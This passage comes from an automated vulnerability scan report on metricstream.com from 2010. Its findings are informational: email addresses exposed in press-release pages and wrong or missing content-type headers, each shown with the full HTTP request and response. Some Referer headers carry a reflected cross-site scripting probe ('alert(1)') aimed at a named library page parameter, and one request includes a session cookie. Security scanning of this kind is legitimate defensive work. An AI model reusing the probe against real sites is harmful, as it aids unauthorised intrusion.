<meta name="Description" content="NASDAQ has part
...[SNIP]...
<a href="mailto:contact@nasdaq.net">contact@nasdaq.net</a>
...[SNIP]...
<a href="mailto:sox@metricstream.com">sox@metricstream.com</a>
...[SNIP]...
<a href="mailto:editor@complianceonline.com">editor@complianceonline.com</a>
...[SNIP]...

5.8. http://metricstream.com/pressNews/pr_210_aei_erm_solution.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /pressNews/pr_210_aei_erm_solution.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /pressNews/pr_210_aei_erm_solution.htm HTTP/1.1
Host: metricstream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmc=216666762; __utmb=216666762.3.10.1289948863; channel=metricstream_website;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"13336-1275371290000"
Last-Modified: Tue, 01 Jun 2010 05:48:10 GMT
Content-Type: text/html
Content-Length: 13336
Date: Wed, 17 Nov 2010 00:18:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>MetricStream Enters into Agreement to Provide Enterprise Risk Management Software Solution to AEI - Press &amp; New
...[SNIP]...
<a href="mailto:pr@metricstream.com" class="gray_link1">pr@metricstream.com</a>
...[SNIP]...

5.9. http://metricstream.com/pressNews/pr_219_suntrust_selects_metricstream_enterprise_wide_grc.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /pressNews/pr_219_suntrust_selects_metricstream_enterprise_wide_grc.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /pressNews/pr_219_suntrust_selects_metricstream_enterprise_wide_grc.htm HTTP/1.1
Host: metricstream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmc=216666762; __utmb=216666762.3.10.1289948863; channel=metricstream_website;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"13310-1277199487000"
Last-Modified: Tue, 22 Jun 2010 09:38:07 GMT
Content-Type: text/html
Content-Length: 13310
Date: Wed, 17 Nov 2010 00:18:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>MetricStream Selected by SunTrust for Enterprise-wide GRC - Pressnews</title>
<meta name="Description" content="Me
...[SNIP]...
<a href="mailto:pr@metricstream.com" class="gray_link1">pr@metricstream.com</a>
...[SNIP]...

5.10. http://metricstream.com/pressNews/pr_225_societe_generale_compliance_risk_assessment.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /pressNews/pr_225_societe_generale_compliance_risk_assessment.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /pressNews/pr_225_societe_generale_compliance_risk_assessment.htm HTTP/1.1
Host: metricstream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmc=216666762; __utmb=216666762.3.10.1289948863; channel=metricstream_website;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"16206-1282283849000"
Last-Modified: Fri, 20 Aug 2010 05:57:29 GMT
Content-Type: text/html
Content-Length: 16206
Date: Wed, 17 Nov 2010 00:18:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Societe Generale Goes Live with MetricStream for Compliance Risk Program - Pressnews</title>
<meta name="Descriptio
...[SNIP]...
<a href="mailto:pr@metricstream.com" class="gray_link1">pr@metricstream.com</a>
...[SNIP]...

5.11. http://metricstream.com/pressNews/pr_229_federal_home_loan_bank_compliance_solutions.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /pressNews/pr_229_federal_home_loan_bank_compliance_solutions.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /pressNews/pr_229_federal_home_loan_bank_compliance_solutions.htm HTTP/1.1
Host: metricstream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmc=216666762; __utmb=216666762.3.10.1289948863; channel=metricstream_website;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"13592-1283941330000"
Last-Modified: Wed, 08 Sep 2010 10:22:10 GMT
Content-Type: text/html
Content-Length: 13592
Date: Wed, 17 Nov 2010 00:18:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Federal Home Loan Bank Selects MetricStream.s Risk Management and Compliance Solutions - Pressnews</title>
<meta na
...[SNIP]...
<a href="mailto:pr@metricstream.com" class="gray_link1">pr@metricstream.com</a>
...[SNIP]...

5.12. http://metricstream.com/pressNews/pr_235_PRA_regulatory_compliance_quality_management.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /pressNews/pr_235_PRA_regulatory_compliance_quality_management.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /pressNews/pr_235_PRA_regulatory_compliance_quality_management.htm HTTP/1.1
Host: metricstream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmc=216666762; __utmb=216666762.3.10.1289948863; channel=metricstream_website;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"14809-1285250167000"
Last-Modified: Thu, 23 Sep 2010 13:56:07 GMT
Content-Type: text/html
Content-Length: 14809
Date: Wed, 17 Nov 2010 00:18:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>PRA International Chooses MetricStream for Regulatory Compliance and Quality Management - Pressnews - MetricStream<
...[SNIP]...
<a href="mailto:pr@metricstream.com" class="gray_link1">pr@metricstream.com</a>
...[SNIP]...

5.13. http://metricstream.com/pressNews/pr_248_SIFMA_IAS_annual_conference_2010.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /pressNews/pr_248_SIFMA_IAS_annual_conference_2010.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /pressNews/pr_248_SIFMA_IAS_annual_conference_2010.htm HTTP/1.1
Host: metricstream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmc=216666762; __utmb=216666762.3.10.1289948863; channel=metricstream_website;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"14806-1287748269000"
Last-Modified: Fri, 22 Oct 2010 11:51:09 GMT
Content-Type: text/html
Content-Length: 14806
Date: Wed, 17 Nov 2010 00:18:47 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>MetricStream to Participate in the 2010 SIFMA IAS Annual Conference - Press &amp; News - MetricStream</title>
<meta
...[SNIP]...
<a href="mailto:pr@metricstream.com" class="gray_link1">pr@metricstream.com</a>
...[SNIP]...

5.14. http://metricstream.com/pressNews/pr_250_RAPS_Annual_Conference_Exhibition_2010.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /pressNews/pr_250_RAPS_Annual_Conference_Exhibition_2010.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /pressNews/pr_250_RAPS_Annual_Conference_Exhibition_2010.htm HTTP/1.1
Host: metricstream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmc=216666762; __utmb=216666762.3.10.1289948863; channel=metricstream_website;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"14784-1288094908000"
Last-Modified: Tue, 26 Oct 2010 12:08:28 GMT
Content-Type: text/html
Content-Length: 14784
Date: Wed, 17 Nov 2010 00:18:47 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>MetricStream to Showcase its Market-leading GRC Solutions at the 2010 RAPS Annual Conference and Exhibition - Press
...[SNIP]...
<a href="mailto:pr@metricstream.com" class="gray_link1">pr@metricstream.com</a>
...[SNIP]...

5.15. http://metricstream.com/pressNews/pressrelease.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /pressNews/pressrelease.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /pressNews/pressrelease.htm HTTP/1.1
Host: metricstream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmc=216666762; __utmb=216666762.3.10.1289948863; channel=metricstream_website;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"117521-1288092841000"
Last-Modified: Tue, 26 Oct 2010 11:34:01 GMT
Content-Type: text/html
Content-Length: 117521
Date: Wed, 17 Nov 2010 00:18:49 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Press Releases - Library - MetricStream</title>
<meta name="Description" content="Management - Gunjan Sinha - Chair
...[SNIP]...
<a href="mailto:pr@metricstream.com" class="gray_link1">pr@metricstream.com </a>
...[SNIP]...

6. Content type incorrectly stated  previous  next
There are 4 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


6.1. http://metricstream.com/js/functions_newweb.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://metricstream.com
Path:   /js/functions_newweb.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /js/functions_newweb.js HTTP/1.1
Accept: */*
Referer: http://metricstream.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: metricstream.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"70716-1276865496000"
Last-Modified: Fri, 18 Jun 2010 12:51:36 GMT
Content-Type: text/javascript
Content-Length: 70716
Date: Wed, 17 Nov 2010 00:18:26 GMT

/*top_header = "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"983\" align=\"center\" bgcolor=\"#FFFFFF\">"+
   "<tr>"+
       "<td width=\"5\" class=\"left_border\"><img src=\"images/spacer
...[SNIP]...

6.2. http://metricstream.com/js/functions_web.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://metricstream.com
Path:   /js/functions_web.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /js/functions_web.js HTTP/1.1
Accept: */*
Referer: http://metricstream.com/company/contactinfo.htm
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: metricstream.com
Proxy-Connection: Keep-Alive
Cookie: __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmb=216666762.3.10.1289948863; __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); channel=metricstream_website; mainbanner_num=8; __utmc=216666762

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"114345-1289885492000"
Last-Modified: Tue, 16 Nov 2010 05:31:32 GMT
Content-Type: text/javascript
Content-Length: 114345
Date: Wed, 17 Nov 2010 00:22:28 GMT

/*top_header = "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"983\" align=\"center\" bgcolor=\"#FFFFFF\">"+
   "<tr>"+
       "<td width=\"5\" class=\"left_border\"><img src=\"images/spac
...[SNIP]...

6.3. http://metricstream.com/library/dwr/interface/browseBy.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://metricstream.com
Path:   /library/dwr/interface/browseBy.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /library/dwr/interface/browseBy.js HTTP/1.1
Accept: */*
Referer: http://metricstream.com/library/Library_3.jsp?type=Case%20Studies62995"%3balert(1)//c572430476c
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: metricstream.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=ABC6877CE14E836EC928884C2622C9CA; channel=metricstream_website; mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmb=216666762.3.10.1289948863; __utmc=216666762; __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 767
Date: Wed, 17 Nov 2010 00:21:17 GMT


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (browseBy == null) var browseBy
...[SNIP]...

6.4. http://metricstream.com/library/functions_web.js  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://metricstream.com
Path:   /library/functions_web.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /library/functions_web.js HTTP/1.1
Accept: */*
Referer: http://metricstream.com/library/Library_3.jsp?type=Case%20Studies62995"%3balert(1)//c572430476c
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: metricstream.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=ABC6877CE14E836EC928884C2622C9CA; channel=metricstream_website; mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmb=216666762.3.10.1289948863; __utmc=216666762; __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"110680-1265881895000"
Last-Modified: Thu, 11 Feb 2010 09:51:35 GMT
Content-Type: text/javascript
Content-Length: 110680
Date: Wed, 17 Nov 2010 00:21:54 GMT

/*top_header = "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"983\" align=\"center\" bgcolor=\"#FFFFFF\">"+
   "<tr>"+
       "<td width=\"5\" class=\"left_border\"><img src=\"images/space
...[SNIP]...

7. Content type is not specified  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /favicon.ico

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: metricstream.com
Proxy-Connection: Keep-Alive
Cookie: channel=metricstream_website; mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmb=216666762.3.10.1289948863; __utmc=216666762; __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"894-1132901461000"
Last-Modified: Fri, 25 Nov 2005 06:51:01 GMT
Content-Length: 894
Date: Wed, 17 Nov 2010 00:18:41 GMT

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

Report generated by XSS.CX at Tue Nov 16 17:25:03 CST 2010.